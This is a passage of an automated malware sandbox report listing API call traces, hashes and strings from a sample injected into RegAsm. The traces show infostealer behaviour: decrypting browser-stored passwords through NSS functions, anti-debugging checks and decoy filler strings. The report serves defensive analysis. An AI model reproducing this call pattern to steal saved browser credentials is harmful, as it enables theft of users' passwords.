                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4d4b4cbfe08da6415348f3d4d0d959f0bcd8a4a06266aefb0e3acec25f657d7d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C124B71900249EADF15EBA5C856BEEBB78AF15308F5440BEA10A735C2DF381B4CCB65
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 0041D7BA
                                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041D7CF
                                                                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(0042A1F8), ref: 0041D7DA
                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 0041D7F6
                                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 0041D7FD
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                                                  • String ID: A
                                                                                                                                                                                                                                                                  • API String ID: 2579439406-773618204
                                                                                                                                                                                                                                                                  • Opcode ID: e61c9fdd7d59faaa1fb35f39a43005a92861c5d66de15950e2ef1c538c06ca0f
                                                                                                                                                                                                                                                                  • Instruction ID: dfcd42966c65ff7a275a9210eb723ab94f029a2cc6d35351f7e83f8be8000ec5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e61c9fdd7d59faaa1fb35f39a43005a92861c5d66de15950e2ef1c538c06ca0f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4121F3BC901204EFC720DF54FD896943BB2FB0B354F90602AE9088B660E7B459D6CF0A
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,6C8A8637,?,?), ref: 6C9E9E88
                                                                                                                                                                                                                                                                  • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011166,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,?,?,6C8A8637), ref: 6C9E9ED6
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • database corruption, xrefs: 6C9E9ECA
                                                                                                                                                                                                                                                                  • %s at line %d of [%.10s], xrefs: 6C9E9ECF
                                                                                                                                                                                                                                                                  • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C9E9EC0
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _byteswap_ulongsqlite3_log
                                                                                                                                                                                                                                                                  • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                  • API String ID: 912837312-598938438
                                                                                                                                                                                                                                                                  • Opcode ID: be0102142f8fdafc006026afb831714bebe17ae5a665f23bebce42252dd69e87
                                                                                                                                                                                                                                                                  • Instruction ID: 9c87c52ff2d6039e2074e07e34850c3336bc44980845b8f9ff6dcc06b6fc6ff8
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: be0102142f8fdafc006026afb831714bebe17ae5a665f23bebce42252dd69e87
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E381C131B012158FCB05CFAAC880AEEB3F6BF5D304B168529E905AB741E730ED45CB90
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,LY@,00000000,00000000), ref: 004062B5
                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,LY@,?,?,0040594C,00000000,?,?), ref: 004062C3
                                                                                                                                                                                                                                                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,LY@,00000000,00000000), ref: 004062D9
                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(00000000,?,?,0040594C,00000000,?,?), ref: 004062E8
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: BinaryCryptLocalString$AllocFree
                                                                                                                                                                                                                                                                  • String ID: LY@
                                                                                                                                                                                                                                                                  • API String ID: 4291131564-2607024699
                                                                                                                                                                                                                                                                  • Opcode ID: ff7a57e258ee2194db69353549e44c41c40a75a87964d0ac16916db8d030a75f
                                                                                                                                                                                                                                                                  • Instruction ID: 80a2873ec0a64e8eb603e25657dde534be305fd059cf9ee24838eb94d5400c67
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ff7a57e258ee2194db69353549e44c41c40a75a87964d0ac16916db8d030a75f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BD012874101224BFCB215F56CC88E8B7FB9EF4BBA0B104069F909EA250D7709990DBA4
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004024A9
                                                                                                                                                                                                                                                                  • CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,00000000,?,00000000,00000000), ref: 004024CF
                                                                                                                                                                                                                                                                  • CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,?,?,00000000,00000000), ref: 004024E9
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: BinaryCryptString$memset
                                                                                                                                                                                                                                                                  • String ID: UNK
                                                                                                                                                                                                                                                                  • API String ID: 1505698593-448974810
                                                                                                                                                                                                                                                                  • Opcode ID: 4fd0c10caa2281c40fb319e1c4e2cda1ee936a09edb20a0fbd5da67967452272
                                                                                                                                                                                                                                                                  • Instruction ID: f8b40498284c7a7a39705aaa28010f8a985b63c5a00aeb1b0a1add28cc7342c0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4fd0c10caa2281c40fb319e1c4e2cda1ee936a09edb20a0fbd5da67967452272
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 680162B290015CBEE711E699DEC1DFF77ACEB45698F00006BB604A2181D6F4AE445A78
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 509fcd85c2a74a12be7cbba117527d0f49d6eef0e325feea3b80436ef0bad4ef
                                                                                                                                                                                                                                                                  • Instruction ID: adbd3dfbf04daca007950aca6c0600d000060b3cbc060ce8cfd915fb156bcaec
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 509fcd85c2a74a12be7cbba117527d0f49d6eef0e325feea3b80436ef0bad4ef
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D511CE787043069FCB11DF28D88066A7BA6FF89368F148479D81A8B701DB31E806CBA1
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0040E34B
                                                                                                                                                                                                                                                                    • Part of subcall function 0040E24B: _EH_prolog.MSVCRT ref: 0040E250
                                                                                                                                                                                                                                                                    • Part of subcall function 0040E24B: lstrlenA.KERNEL32(?,6CDA7FA0,75AA5460,00000000), ref: 0040E274
                                                                                                                                                                                                                                                                    • Part of subcall function 0040E24B: strchr.MSVCRT ref: 0040E286
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,6CDA7FA0,00000000), ref: 0040E39A
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,6CDA7FA0,00000000), ref: 0040E3A1
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,6CDA7FA0,00000000), ref: 0040E3B6
                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,6CDA7FA0,00000000), ref: 0040E3BD
                                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 0040E3F6
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E40D
                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E414
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E43A
                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E441
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E448
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E44F
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E464
                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E46B
                                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 0040E47E
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E48F
                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E496
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,75AA5460,?,6CDA7FA0), ref: 0040E4B1
                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E4B8
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,75AA5460,?,6CDA7FA0), ref: 0040E4BF
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E4C6
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,75AA5460,?,6CDA7FA0), ref: 0040E4DB
                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E4E2
                                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 0040E4F5
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 0040E506
                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,75AA5460), ref: 0040E50D
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E52F
                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E536
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E53D
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E544
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E55C
                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E563
                                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 0040E576
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E587
                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E58E
                                                                                                                                                                                                                                                                    • Part of subcall function 0040E19D: strlen.MSVCRT ref: 0040E1B4
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E597
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E5A7
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E5AE
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E5DA
                                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 0040E5FE
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,00000001,00000000,00000001,00000000,?,?,00000000), ref: 0040E627
                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E62E
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E633
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000001,?,?,?,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E63E
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E645
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E656
                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E65D
                                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 0040E66B
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 0040E677
                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,75AA5460), ref: 0040E67E
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 0040E6A4
                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 0040E6AB
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000010), ref: 0040E6B2
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0040E6B9
                                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 0040E6D1
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 0040E6E2
                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 0040E6E9
                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 0040E737
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 0040E77B
                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,75AA5460), ref: 0040E782
                                                                                                                                                                                                                                                                    • Part of subcall function 0040E24B: strchr.MSVCRT ref: 0040E2AA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040E24B: lstrlenA.KERNEL32(?), ref: 0040E2C8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040E24B: GetProcessHeap.KERNEL32(00000008,-00000001), ref: 0040E2D5
                                                                                                                                                                                                                                                                    • Part of subcall function 0040E24B: HeapAlloc.KERNEL32(00000000), ref: 0040E2DC
                                                                                                                                                                                                                                                                    • Part of subcall function 0040E24B: strcpy_s.MSVCRT ref: 0040E317
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 0040E7CE
                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 0040E7D5
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Heap$Process$Free$Allocstrcpy_s$lstrlen$H_prologstrchrstrlen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2599614518-0
                                                                                                                                                                                                                                                                  • Opcode ID: b2b410e4117911ea0987c9f03c80ea1092ef309a952777d34adca9f9d3e75bda
                                                                                                                                                                                                                                                                  • Instruction ID: d9d6268398844ff67752c899a6c42ea79fae635aad79df2f3a4eca69292749a3
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b2b410e4117911ea0987c9f03c80ea1092ef309a952777d34adca9f9d3e75bda
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 54E135B1C0021AAFCF11AFE1CD899EFBB79BF09304F10182AF615B6191DB794A54CB65
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • GAS5 noncoding RNA, which accumulates in growth arrested cells, acts as a decoy hormone response element for the glucocorticoid re, xrefs: 00417481
                                                                                                                                                                                                                                                                  • The KLW SE10B is a low-emissions diesel switcher locomotive built by Knoxville Locomotive Works. It is powered by a single MTU Ser, xrefs: 0041744E
                                                                                                                                                                                                                                                                  • The KLW SE10B is a low-emissions diesel switcher locomotive built by Knoxville Locomotive Works. It is powered by a single MTU Ser, xrefs: 0041742B
                                                                                                                                                                                                                                                                  • kernel32.dll, xrefs: 00417441
                                                                                                                                                                                                                                                                  • The KLW SE10B is a low-emissions diesel switcher locomotive built by Knoxville Locomotive Works. It is powered by a single MTU Ser, xrefs: 00417477
                                                                                                                                                                                                                                                                  • The KLW SE10B is a low-emissions diesel switcher locomotive built by Knoxville Locomotive Works. It is powered by a single MTU Ser, xrefs: 0041749E
                                                                                                                                                                                                                                                                  • GAS5 noncoding RNA, which accumulates in growth arrested cells, acts as a decoy hormone response element for the glucocorticoid re, xrefs: 0041745D
                                                                                                                                                                                                                                                                  • GAS5 noncoding RNA, which accumulates in growth arrested cells, acts as a decoy hormone response element for the glucocorticoid re, xrefs: 00417435
                                                                                                                                                                                                                                                                  • GAS5 noncoding RNA, which accumulates in growth arrested cells, acts as a decoy hormone response element for the glucocorticoid re, xrefs: 004174AD
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AddressProc$wcslen$LibraryLoad
                                                                                                                                                                                                                                                                  • String ID: GAS5 noncoding RNA, which accumulates in growth arrested cells, acts as a decoy hormone response element for the glucocorticoid re$GAS5 noncoding RNA, which accumulates in growth arrested cells, acts as a decoy hormone response element for the glucocorticoid re$GAS5 noncoding RNA, which accumulates in growth arrested cells, acts as a decoy hormone response element for the glucocorticoid re$GAS5 noncoding RNA, which accumulates in growth arrested cells, acts as a decoy hormone response element for the glucocorticoid re$The KLW SE10B is a low-emissions diesel switcher locomotive built by Knoxville Locomotive Works. It is powered by a single MTU Ser$The KLW SE10B is a low-emissions diesel switcher locomotive built by Knoxville Locomotive Works. It is powered by a single MTU Ser$The KLW SE10B is a low-emissions diesel switcher locomotive built by Knoxville Locomotive Works. It is powered by a single MTU Ser$The KLW SE10B is a low-emissions diesel switcher locomotive built by Knoxville Locomotive Works. It is powered by a single MTU Ser$kernel32.dll
                                                                                                                                                                                                                                                                  • API String ID: 3854642915-1522344851
                                                                                                                                                                                                                                                                  • Opcode ID: 4eba9e446e52d6073f555b3b86fb404c978fed4c802a542cc29d9714122e7a4b
                                                                                                                                                                                                                                                                  • Instruction ID: ad93c572eefa7165a372745686be9ef41ca24fd1b9ca20db8f61415a605ff2a5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4eba9e446e52d6073f555b3b86fb404c978fed4c802a542cc29d9714122e7a4b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C3815D7D514280EFEB526FA0FD18A653FB3F70BB81714602AEA058A234DB3544D4EF54
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00408434
                                                                                                                                                                                                                                                                  • NSS_Init.NSS3(00000000,?,00000000,?), ref: 00408451
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00408534
                                                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0040853C
                                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00408548
                                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT ref: 00408552
                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00408563
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040856F
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00408576
                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(?), ref: 00408588
                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(-00000010), ref: 004085A2
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000), ref: 004085B6
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 004085C8
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00425DA0), ref: 004085D6
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 004085E8
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00425DA4), ref: 004085F6
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000), ref: 00408605
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,-00000010), ref: 0040860F
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00425DA8), ref: 0040861D
                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(-000000FE), ref: 0040862D
                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000014), ref: 0040863D
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000), ref: 00408651
                                                                                                                                                                                                                                                                    • Part of subcall function 00408331: memset.MSVCRT ref: 00408358
                                                                                                                                                                                                                                                                    • Part of subcall function 00408331: lstrlenA.KERNEL32(0040865D,00000001,?,00000014,00000000,00000000,?,0040865D,00000014), ref: 00408372
                                                                                                                                                                                                                                                                    • Part of subcall function 00408331: CryptStringToBinaryA.CRYPT32(0040865D,00000000,?,0040865D,00000014), ref: 0040837C
                                                                                                                                                                                                                                                                    • Part of subcall function 00408331: PK11_GetInternalKeySlot.NSS3(?,0040865D,00000014), ref: 0040838A
                                                                                                                                                                                                                                                                    • Part of subcall function 00408331: PK11_Authenticate.NSS3(00000000,00000001,00000000,?,0040865D,00000014), ref: 0040839F
                                                                                                                                                                                                                                                                    • Part of subcall function 00408331: PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 004083CA
                                                                                                                                                                                                                                                                    • Part of subcall function 00408331: memcpy.MSVCRT ref: 004083E4
                                                                                                                                                                                                                                                                    • Part of subcall function 00408331: PK11_FreeSlot.NSS3(?), ref: 00408414
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00408662
